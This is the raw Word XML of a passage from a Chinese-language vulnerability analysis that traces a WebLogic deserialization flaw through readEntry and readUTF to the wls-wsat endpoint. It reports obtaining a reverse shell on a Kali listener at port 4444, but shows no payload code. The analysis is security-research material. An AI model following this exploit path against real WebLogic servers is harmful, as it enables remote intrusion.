      <w:r w:rsidRPr="00B45D5C">
        <w:t>weblogic.workarea.spi</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45D5C">
        <w:t>WorkContextEntryImpl</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45D5C">
        <w:t xml:space="preserve"> readEntry</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行调用了参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>readUTF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，</w:t>
      </w:r>
      <w:r w:rsidR="00626B45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟进该方法；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3403DD" w14:textId="2DE56748" w:rsidR="00626B45" w:rsidRPr="00B45D5C" w:rsidRDefault="00626B45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54B7F96A" wp14:editId="051E82AB">
            <wp:extent cx="5274310" cy="252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FE18" w14:textId="755708E3" w:rsidR="00B45D5C" w:rsidRDefault="00626B45" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很明显，</w:t>
      </w:r>
      <w:r w:rsidRPr="00626B45">
        <w:t>weblogic.wsee.workarea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00626B45">
        <w:t>WorkContextXmlInputAdapter</w:t>
      </w:r>
      <w:r>
        <w:t>#readUTF()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04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行这里对传入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数做了反序列化操作；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B926648" w14:textId="09D72D06" w:rsidR="00626B45" w:rsidRPr="00626B45" w:rsidRDefault="00626B45" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前监听了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，在执行完</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行之后在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中发现成功反弹端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE0369" w14:textId="32D6C9B5" w:rsidR="00C950B6" w:rsidRDefault="00626B45" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7504F42D" wp14:editId="1C0CBAC6">
            <wp:extent cx="5274310" cy="614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70E0" w14:textId="77777777" w:rsidR="000D6077" w:rsidRPr="000D6077" w:rsidRDefault="000D6077" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000D6077" w:rsidRPr="000D607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F4353" w14:textId="77777777" w:rsidR="007F123D" w:rsidRDefault="007F123D" w:rsidP="004149C7">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="75E68BD4" w14:textId="77777777" w:rsidR="007F123D" w:rsidRDefault="007F123D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9D17A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02EA" w14:textId="77777777" w:rsidR="007C37E3" w:rsidRDefault="007C37E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CE04D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3C113" w14:textId="77777777" w:rsidR="007F123D" w:rsidRDefault="007F123D" w:rsidP="004149C7">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="42B664EC" w14:textId="77777777" w:rsidR="007F123D" w:rsidRDefault="007F123D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E6CD9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DBCDB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127A8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DE"/>
    <w:rsid w:val="00075769"/>
    <w:rsid w:val="000A1C3E"/>
    <w:rsid w:val="000A342B"/>
    <w:rsid w:val="000D6077"/>
    <w:rsid w:val="0021694F"/>
    <w:rsid w:val="00320897"/>
    <w:rsid w:val="0039415F"/>
    <w:rsid w:val="003F34DE"/>
    <w:rsid w:val="004149C7"/>
    <w:rsid w:val="00417252"/>
    <w:rsid w:val="00567764"/>
    <w:rsid w:val="00610D79"/>
    <w:rsid w:val="00626B45"/>
    <w:rsid w:val="0062788E"/>
    <w:rsid w:val="00677DEC"/>
    <w:rsid w:val="00782998"/>
    <w:rsid w:val="007B3EB1"/>
    <w:rsid w:val="007C37E3"/>
    <w:rsid w:val="007F123D"/>
    <w:rsid w:val="007F791A"/>
    <w:rsid w:val="00907AF4"/>
    <w:rsid w:val="00A41F96"/>
    <w:rsid w:val="00B45D5C"/>
    <w:rsid w:val="00B918B8"/>
    <w:rsid w:val="00C950B6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726EB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{39D6F5C6-A622-42CA-91DB-3B3FC158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077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table" w:styleId="af">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00A41F96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62788E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62788E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782998"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007829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192.168.xx.xx:7001/wls-wsat/CoordinatorPortTyp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LmetY</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>知 夏</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-05T14:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-06T01:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>